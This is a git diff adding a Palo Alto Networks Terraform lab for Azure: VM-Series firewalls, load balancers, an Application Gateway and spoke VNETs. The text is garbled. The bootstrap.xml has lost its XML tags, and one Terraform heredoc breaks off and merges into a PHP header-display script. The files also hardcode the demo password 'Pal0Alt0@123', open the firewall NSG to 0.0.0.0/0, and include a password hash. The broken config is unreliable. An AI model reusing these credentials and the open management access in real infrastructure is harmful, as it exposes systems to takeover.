diff --git a/azure/transit_2fw_2spoke_common/terraform.tfvars b/azure/transit_2fw_2spoke_common/terraform.tfvars
new file mode 100644
index 00000000..2f122c28
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/terraform.tfvars
@@ -0,0 +1,43 @@
+#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode
+#fw_license = "bundle1"
+#fw_license = "bundle2"
+
+global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription
+location = "eastus"
+
+# -----------------------------------------------------------------------
+# VM-Series resource group variables
+
+fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group
+fw_count = 2
+fw_panos = "9.0.1"
+fw_nsg_prefix = "0.0.0.0/0"
+fw_username = "paloalto"
+fw_password = "Pal0Alt0@123"
+fw_internal_lb_ip = "10.0.2.100"
+
+# -----------------------------------------------------------------------
+# Transit resource group variables
+
+transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group
+transit_vnet_cidr = "10.0.0.0/16"
+transit_subnet_names = ["mgmt", "untrust", "trust"]
+transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24"]
+
+# -----------------------------------------------------------------------
+# Spoke resource group variables
+
+spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group
+spoke1_vm_count = 2
+spoke1_vnet_cidr = "10.1.0.0/16"
+spoke1_subnet_cidrs = ["10.1.0.0/24"]
+spoke1_internal_lb_ip = "10.1.0.100"
+
+spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group
+spoke2_vm_count = 1
+spoke2_vnet_cidr = "10.2.0.0/16"
+spoke2_subnet_cidrs = ["10.2.0.0/24"]
+
+spoke_username = "paloalto"
+spoke_password = "Pal0Alt0@123"
+spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"]
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/variables.tf b/azure/transit_2fw_2spoke_common/variables.tf
new file mode 100644
index 00000000..4899c169
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/variables.tf
@@ -0,0 +1,129 @@
+variable location {
+ description = "Enter a location"
+}
+
+variable fw_prefix {
+ description = "Prefix to add to all resources added in the firewall resource group"
+ default = ""
+}
+
+variable fw_license {
+ description = "VM-Series license: byol, bundle1, or bundle2"
+ # default = "byol"
+ # default = "bundle1"
+ # default = "bundle2"
+}
+
+variable global_prefix {
+ description = "Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription"
+}
+#-----------------------------------------------------------------------------------------------------------------
+# Transit VNET variables
+
+variable transit_prefix {
+}
+
+variable transit_vnet_cidr {
+}
+
+variable transit_subnet_names {
+ type = list(string)
+}
+
+variable transit_subnet_cidrs {
+ type = list(string)
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# VM-Series variables
+
+variable fw_count {
+}
+
+variable fw_nsg_prefix {
+}
+
+variable fw_panos {
+}
+
+variable fw_username {
+}
+
+variable fw_password {
+}
+
+variable fw_internal_lb_ip {
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Spoke variables
+
+variable spoke_username {
+}
+
+variable spoke_password {
+}
+
+variable spoke_udrs {
+}
+
+variable spoke1_prefix {
+ description = "Prefix to add to all resources added in spoke1's resource group"
+}
+
+variable spoke1_vm_count {
+}
+
+variable spoke1_vnet_cidr {
+}
+
+variable spoke1_subnet_cidrs {
+ type = list(string)
+}
+
+variable spoke1_internal_lb_ip {
+}
+
+variable spoke2_prefix {
+ description = "Prefix to add to all resources added in spoke2's resource group"
+}
+
+variable spoke2_vm_count {
+}
+
+variable spoke2_vnet_cidr {
+}
+
+variable spoke2_subnet_cidrs {
+ type = list(string)
+}
+
+variable tags {
+ description = "The tags to associate with newly created resources"
+ type = map(string)
+
+ default = {}
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Azure environment variables
+
+variable client_id {
+ description = "Azure client ID"
+ default = ""
+}
+
+variable client_secret {
+ description = "Azure client secret"
+ default = ""
+}
+
+variable subscription_id {
+ description = "Azure subscription ID"
+ default = ""
+}
+
+variable tenant_id {
+ description = "Azure tenant ID"
+ default = ""
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf
new file mode 100644
index 00000000..c66ebfe6
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/README.md b/azure/transit_2fw_2spoke_common_appgw/README.md
new file mode 100644
index 00000000..01101669
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/README.md
@@ -0,0 +1,60 @@
+# 2 x VM-Series / Public LB / Internal LB / AppGW / 2 x Spoke VNETs
+
+This is an extension of the Terraform template located at [**transit_2fw_2spoke_common**](https://github.com/wwce/terraform/tree/master/azure/transit_2fw_2spoke_common).
+
+Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer or an application gateway (both are deployed). The Application Gateway is configured to load balance HTTP traffic on port 80.
+
+N.B. - The template can take 15+ minutes to complete due to the Application Gateway deployment time. When complete, the FQDN of the Application Gateway is included in the output.
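+
+Spoke-to-firewall routing is driven by two values in terraform.tfvars: each destination listed in `spoke_udrs` is programmed as a UDR in the spoke VNETs with `fw_internal_lb_ip` (the frontend of the firewalls' internal load balancer) as the next hop, as wired up in spokes.tf:
+
+```
+fw_internal_lb_ip = "10.0.2.100"                                 # internal LB frontend in the transit trust subnet
+spoke_udrs        = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"]  # destinations routed from the spokes to the firewalls
+```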
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+
+
+## Prerequisites
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell (**Bash only**) and run the following.
+```
+# Accept VM-Series EULA for desired license type (replace <license> with byol, bundle1, or bundle2)
+$ az vm image terms accept --urn paloaltonetworks:vmseries1:<license>:9.0.1
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common_appgw
+```
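+
+Optionally, confirm the terms were accepted before proceeding (same URN, with `<license>` replaced by your license type):
+```
+# Should report "accepted": true in the JSON output
+$ az vm image terms show --urn paloaltonetworks:vmseries1:<license>:9.0.1
+```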
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1.
+
+```
+$ vi terraform.tfvars
+```
+
+
+Your terraform.tfvars should look like the example below before proceeding.
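+
+If you accepted the BYOL terms in step 1, only the byol line is left uncommented:
+
+```
+fw_license = "byol"     # Uncomment 1 fw_license to select VM-Series licensing mode
+#fw_license = "bundle1"
+#fw_license = "bundle2"
+```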
+
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
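+
+When the apply completes, Terraform prints the outputs defined in fw_common.tf, including the Application Gateway URL, the public load balancer URL, the firewall management URLs, and an SSH command for the spoke2 VM. Any of them can be re-read later without re-applying:
+```
+# Re-print a single output, e.g. the Application Gateway URL
+$ terraform output AppGW
+```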
+
+
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanying files are released under an as-is, best-effort support policy. These scripts should be seen as community supported, and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used by the scripts or templates (the VM-Series firewall) is still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml
new file mode 100644
index 00000000..47185aa0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml
@@ -0,0 +1,1058 @@
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+ fw1
+
+
+
+ yes
+
+
+ FQDN
+
+ fw1
+ paloalto
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+
+ yes
+
+
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ no
+ yes
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+
+
+
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 168.63.129.16/32
+
+
+
+
+
+
+ untrust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ no
+
+
+
+
+ ethernet1/1
+
+
+ no
+
+
+
+
+
+ ethernet1/2
+ ethernet1/1
+ vlan
+ loopback
+ tunnel
+
+
+
+ untrust-vr
+ trust-vr
+
+
+
+
+
+
+
+
+
+
+ 22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+ universal
+
+ trust
+
+
+ trust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ spoke1-vnet
+ spoke2-vnet
+
+ no
+
+ ping
+ ssh
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+ universal
+
+ trust
+
+
+ untrust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ any
+
+ no
+
+ apt-get
+ ntp
+ ping
+ ssl
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+ no
+ This NAT policy prevents the public load balancer's health probes from being NATed.
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ service-http
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke1-intlb
+ 80
+
+ NATs inbound request to internal LB in spoke1
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ tcp-22
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke2-vm
+ 22
+
+ NATs inbound request to jump server in Spoke 2.
+
+
+ ipv4
+
+ trust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+
+
+
+ ethernet1/1
+
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 168.63.129.16/32
+
+ azure-resource
+
+
+
+ 10.1.0.4
+
+ azure-resource
+
+
+
+ 10.2.0.4
+
+ azure-resource
+
+
+
+ 10.1.0.0/16
+
+ azure-resource
+
+
+
+ 10.2.0.0/16
+
+ azure-resource
+
+
+
+ 10.1.0.100
+
+ azure-resource
+
+
+
+
+
+
+
+
+
+
+
+
+ color20
+
+
+ color13
+
+
+ color24
+
+
+ color22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ *
+
+
+ yes
+
+
+
+
+ $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1
+
+
+ yes
+
+
+
+
+
+ yes
+ 8
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt
new file mode 100644
index 00000000..44878949
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt
@@ -0,0 +1,9 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes
new file mode 100644
index 00000000..e69de29b
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_common.tf b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf
new file mode 100644
index 00000000..e35b4dd1
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf
@@ -0,0 +1,134 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create resource group for FWs, FW NICs, and FW LBs
+
+resource "azurerm_resource_group" "common_fw" {
+ name = "${var.global_prefix}-${var.fw_prefix}-rg"
+ location = var.location
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create storage account and file share for bootstrapping
+
+resource "random_string" "main" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_account" "main" {
+ name = random_string.main.result
+ account_tier = "Standard"
+ account_replication_type = "LRS"
+ location = azurerm_resource_group.common_fw.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+module "common_fileshare" {
+ source = "./modules/azure_bootstrap/"
+ name = "${var.fw_prefix}-bootstrap"
+ quota = 1
+ storage_account_name = azurerm_storage_account.main.name
+ storage_account_key = azurerm_storage_account.main.primary_access_key
+ local_file_path = "bootstrap_files/"
+}
+
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series firewalls. The number of instances deployed is set by fw_count.
+
+module "common_fw" {
+ source = "./modules/vmseries/"
+ name = "${var.fw_prefix}-vm"
+ vm_count = var.fw_count
+ username = var.fw_username
+ password = var.fw_password
+ panos = var.fw_panos
+ license = var.fw_license
+ nsg_prefix = var.fw_nsg_prefix
+ avset_name = "${var.fw_prefix}-avset"
+ subnet_mgmt = module.vnet.vnet_subnets[0]
+ subnet_untrust = module.vnet.vnet_subnets[1]
+ subnet_trust = module.vnet.vnet_subnets[2]
+ nic0_public_ip = true
+ nic1_public_ip = true
+ nic2_public_ip = false
+ nic1_backend_pool_ids = [module.common_extlb.backend_pool_id]
+ nic2_backend_pool_ids = [module.common_intlb.backend_pool_id]
+ bootstrap_storage_account = azurerm_storage_account.main.name
+ bootstrap_access_key = azurerm_storage_account.main.primary_access_key
+ bootstrap_file_share = module.common_fileshare.file_share_name
+ bootstrap_share_directory = "None"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+ dependencies = [
+ module.common_fileshare.completion
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool.
+
+module "common_extlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-public-lb"
+ type = "public"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [80, 22, 443]
+ backend_ports = [80, 22, 443]
+ protocol = "Tcp"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool
+
+module "common_intlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-internal-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [0]
+ backend_ports = [0]
+ protocol = "All"
+ subnet_id = module.vnet.vnet_subnets[2]
+ private_ip_address = var.fw_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create Application Gateway. The Application Gateway uses the firewalls' untrust interface IPs as its backend pool.
+
+module "common_appgw" {
+ source = "./modules/appgw/"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+ subnet_appgw = module.vnet.vnet_subnets[3]
+ fw_private_ips = module.common_fw.nic1_private_ip
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Outputs to terminal
+
+output AppGW {
+ value = "http://${module.common_appgw.appgw_fqdn}"
+}
+
+output EXT-LB {
+ value = "http://${module.common_extlb.public_ip[0]}"
+}
+
+output MGMT-FW1 {
+ value = "https://${module.common_fw.nic0_public_ip[0]}"
+}
+
+output MGMT-FW2 {
+ value = "https://${module.common_fw.nic0_public_ip[1]}"
+}
+
+output SSH-TO-SPOKE2 {
+ value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}"
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf
new file mode 100644
index 00000000..4ee6701d
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf
@@ -0,0 +1,16 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create Transit VNET
+resource "azurerm_resource_group" "transit" {
+ name = "${var.global_prefix}-${var.transit_prefix}-rg"
+ location = var.location
+}
+
+module "vnet" {
+ source = "./modules/vnet/"
+ name = "${var.transit_prefix}-vnet"
+ address_space = var.transit_vnet_cidr
+ subnet_names = var.transit_subnet_names
+ subnet_prefixes = var.transit_subnet_cidrs
+ location = var.location
+ resource_group_name = azurerm_resource_group.transit.name
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/images/diagram.png b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png
new file mode 100644
index 00000000..45f1d146
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png
new file mode 100644
index 00000000..afd57343
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf
new file mode 100644
index 00000000..202714da
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf
@@ -0,0 +1,75 @@
+#### AppGW2 ####
+resource "random_id" "storage_account" {
+ byte_length = 2
+}
+
+resource "azurerm_public_ip" "appgw" {
+ name = "appgw"
+ location = var.location
+ resource_group_name = var.resource_group_name
+ domain_name_label = "appgw-${lower(random_id.storage_account.hex)}"
+ allocation_method = "Dynamic"
+}
+
+resource "azurerm_application_gateway" "appgw" {
+ name = "appgw"
+ location = var.location
+ resource_group_name = var.resource_group_name
+
+ sku {
+ name = "WAF_Medium"
+ tier = "WAF"
+ capacity = 2
+ }
+
+ waf_configuration {
+ enabled = "true"
+ firewall_mode = "Prevention"
+ rule_set_type = "OWASP"
+ rule_set_version = "3.0"
+ }
+
+ gateway_ip_configuration {
+ name = "appgw"
+ subnet_id = var.subnet_appgw
+ }
+
+ frontend_port {
+ name = "http"
+ port = 80
+ }
+
+ frontend_ip_configuration {
+ name = "appgw"
+ public_ip_address_id = azurerm_public_ip.appgw.id
+ }
+
+ backend_address_pool {
+ name = "BackendPool"
+ ip_addresses = var.fw_private_ips
+
+ }
+
+ http_listener {
+ name = "http"
+ frontend_ip_configuration_name = "appgw"
+ frontend_port_name = "http"
+ protocol = "Http"
+ }
+
+ backend_http_settings {
+ name = "http"
+ cookie_based_affinity = "Disabled"
+ port = 80
+ protocol = "Http"
+ request_timeout = 1
+ }
+
+ request_routing_rule {
+ name = "http"
+ rule_type = "Basic"
+ http_listener_name = "http"
+ backend_address_pool_name = "BackendPool"
+ backend_http_settings_name = "http"
+ }
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf
new file mode 100644
index 00000000..97cb2d85
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf
@@ -0,0 +1,3 @@
+output appgw_fqdn {
+ value = azurerm_public_ip.appgw.fqdn
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf
new file mode 100644
index 00000000..c3dbfab8
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf
@@ -0,0 +1,17 @@
+variable "location" {
+ description = "Location of the resource group to place App Gateway in."
+}
+
+variable "resource_group_name" {
+ description = "Name of the resource group to place App Gateway in."
+}
+
+variable "subnet_appgw" {
+ description = "AppGW Subnet"
+}
+
+variable "fw_private_ips" {
+ description = "list of private IP addresses from the deployed FW"
+ type = list(string)
+ default = null
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf
new file mode 100644
index 00000000..1a5c1f7a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf
@@ -0,0 +1,40 @@
+
+
+resource "random_string" "randomstring" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_share" "main" {
+ name = "${var.name}${random_string.randomstring.result}"
+ storage_account_name = var.storage_account_name
+ quota = var.quota
+}
+
+resource "null_resource" "upload" {
+provisioner "local-exec" {
+ command = <
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl
new file mode 100644
index 00000000..1d02e945
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl
@@ -0,0 +1,10 @@
+#cloud-config
+
+runcmd:
+ - sudo apt-get update -y
+ - sudo apt-get install -y php
+ - sudo apt-get install -y apache2
+ - sudo apt-get install -y libapache2-mod-php
+ - sudo rm -f /var/www/html/index.html
+ - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
+ - sudo systemctl restart apache2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/spokes.tf b/azure/transit_2fw_2spoke_common_appgw/spokes.tf
new file mode 100644
index 00000000..a4bf874b
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/spokes.tf
@@ -0,0 +1,97 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs
+
+resource "azurerm_resource_group" "spoke1_rg" {
+ name = "${var.global_prefix}-${var.spoke1_prefix}-rg"
+ location = var.location
+}
+
+module "spoke1_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke1_prefix}-vnet"
+ address_space = var.spoke1_vnet_cidr
+ subnet_prefixes = var.spoke1_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+data "template_file" "web_startup" {
+ template = "${file("${path.module}/scripts/web_startup.yml.tpl")}"
+}
+
+module "spoke1_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke1_prefix}-vm"
+ vm_count = var.spoke1_vm_count
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ backend_pool_ids = [module.spoke1_lb.backend_pool_id]
+ custom_data = base64encode(data.template_file.web_startup.rendered)
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+module "spoke1_lb" {
+ source = "./modules/lb/"
+ name = "${var.spoke1_prefix}-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [80]
+ frontend_ports = [80]
+ backend_ports = [80]
